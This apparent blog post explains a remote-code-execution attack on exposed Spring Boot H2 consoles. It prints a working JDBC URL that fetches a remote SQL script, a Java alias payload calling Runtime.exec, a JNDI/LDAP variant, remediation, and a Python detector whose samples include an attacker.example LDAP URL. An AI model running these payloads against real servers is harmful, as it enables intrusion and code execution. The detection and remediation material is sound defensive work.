blog-sharon
Unsafe component H2 is referenced, causing remote code execution through the H2 web console (attacker-controlled JDBC URL with INIT=RUNSCRIPT; a JNDI/LDAP variant also exists on older JDKs)
URL: http://host:port/h2-console
Driver Class: org.h2.Driver
JDBC URL: jdbc:h2:mem:dbtest;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql'
When the console opens the connection, H2 fetches and executes the INIT script from the remote URL. The h2.sql served from that URL is below (the alias body is Java compiled by H2 at CREATE time; the command is macOS-specific and only a proof of concept):
-- define a user function whose body is Java source; H2 compiles it in-process
CREATE ALIAS shel1 AS $$void shel1(String s) throws Exception {
    java.lang.Runtime.getRuntime().exec(s);
}$$;
-- calling the alias runs the command with the privileges of the JVM
SELECT shel1('open -a Calculator.app');
Vulnerable environment: Spring Boot + H2 with spring.h2.console.enabled=true. The RUNSCRIPT vector above works regardless of JDK version. The JNDI/LDAP variant (driver class javax.naming.InitialContext with an ldap:// JDBC URL) additionally requires a JDK older than 6u211, 7u201, 8u191 or 11.0.1, since later releases set com.sun.jndi.ldap.object.trustURLCodebase to false by default.
Remediation: disable the console (spring.h2.console.enabled=false), or upgrade the JDK. Note that the JDK upgrade only closes the JNDI/LDAP variant; the RUNSCRIPT vector remains as long as the console is reachable, so disabling it (or keeping it off any untrusted network) is the real fix.
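For the defensive side, the indicators of this attack are visible in the console login request itself: an H2 JDBC URL carrying INIT=RUNSCRIPT FROM a remote URL (or an inline CREATE ALIAS), or the JNDI driver class paired with an ldap:// or rmi:// URL. The following detector is an added example written for this post, not code from the original author or from the H2 project. It assumes the H2 console login form is submitted as a POST to /h2-console/login.do with form fields `driver` and `url`, and the request bodies it scans are constructed samples, not captured traffic; the host `attacker.example` is hypothetical.

```python
"""
Added example: flag H2 console login attempts whose JDBC URL or driver
class carries a code-execution payload.

Assumptions (not from the original post): the H2 web console receives its
login form as POST /h2-console/login.do with form fields 'driver' and 'url';
the sample requests at the bottom are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlencode

# Schemes that RUNSCRIPT FROM would fetch over the network.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Driver class that turns the JDBC URL into a JNDI lookup (ldap:// / rmi://).
JNDI_DRIVER = "javax.naming.InitialContext"


def parse_h2_url(url):
    """Split an H2 JDBC URL into its base and its ';KEY=VALUE' settings.

    H2 escapes a literal ';' inside a setting value as '\\;', so we split on
    unescaped semicolons only and unescape afterwards. Keys are upper-cased
    because H2 treats them case-insensitively.
    """
    parts = re.split(r"(?<!\\);", url)
    base = parts[0]
    settings = {}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            settings[key.strip().upper()] = value.replace("\\;", ";")
    return base, settings


def classify_login(driver, url):
    """Return a list of human-readable findings for one console login attempt."""
    findings = []
    base, settings = parse_h2_url(url)
    init = settings.get("INIT", "")
    init_upper = init.upper()

    # Vector 1: INIT=RUNSCRIPT FROM '<source>' executes SQL from elsewhere.
    if "RUNSCRIPT" in init_upper:
        match = re.search(r"FROM\s+'([^']*)'", init, re.IGNORECASE)
        src = match.group(1) if match else ""
        if src.lower().startswith(REMOTE_SCHEMES):
            findings.append(f"INIT runs remote script: {src}")
        else:
            findings.append(f"INIT runs local script: {src or '<unparsed>'}")

    # Vector 1b: the Java alias can also be defined directly in INIT.
    if "CREATE ALIAS" in init_upper:
        findings.append("INIT defines a Java alias inline")

    # Vector 2: JNDI lookup through the driver class (JDK-version dependent).
    if driver == JNDI_DRIVER and base.lower().startswith(("ldap://", "rmi://")):
        findings.append(f"JNDI lookup via driver class: {base}")

    return findings


def scan_requests(requests):
    """Classify (path, urlencoded-body) tuples; return (url, findings) for hits only."""
    hits = []
    for path, body in requests:
        if not path.endswith("/login.do"):
            continue
        form = parse_qs(body)
        driver = form.get("driver", [""])[0]
        url = form.get("url", [""])[0]
        findings = classify_login(driver, url)
        if findings:
            hits.append((url, findings))
    return hits


# Constructed sample requests (not captured traffic). The first two are
# malicious logins; the third is a benign one; the fourth is not a login.
SAMPLE_REQUESTS = [
    ("/h2-console/login.do", urlencode({
        "driver": "org.h2.Driver",
        "url": "jdbc:h2:mem:dbtest;MODE=MSSQLServer;"
               "INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql'",
        "user": "sa"})),
    ("/h2-console/login.do", urlencode({
        "driver": JNDI_DRIVER,
        "url": "ldap://attacker.example:1389/Exploit"})),  # hypothetical host
    ("/h2-console/login.do", urlencode({
        "driver": "org.h2.Driver",
        "url": "jdbc:h2:mem:testdb;DB_CLOSE_DELAY=-1",
        "user": "sa"})),
    ("/h2-console/query.do", urlencode({"sql": "SELECT 1"})),
]

if __name__ == "__main__":
    for url, findings in scan_requests(SAMPLE_REQUESTS):
        print(url)
        for finding in findings:
            print("  -", finding)
```

Running it flags the two payload logins and stays silent on the ordinary in-memory connection. In practice the same rules can be applied to access logs or a WAF, but the stronger control is still to leave the console disabled in production.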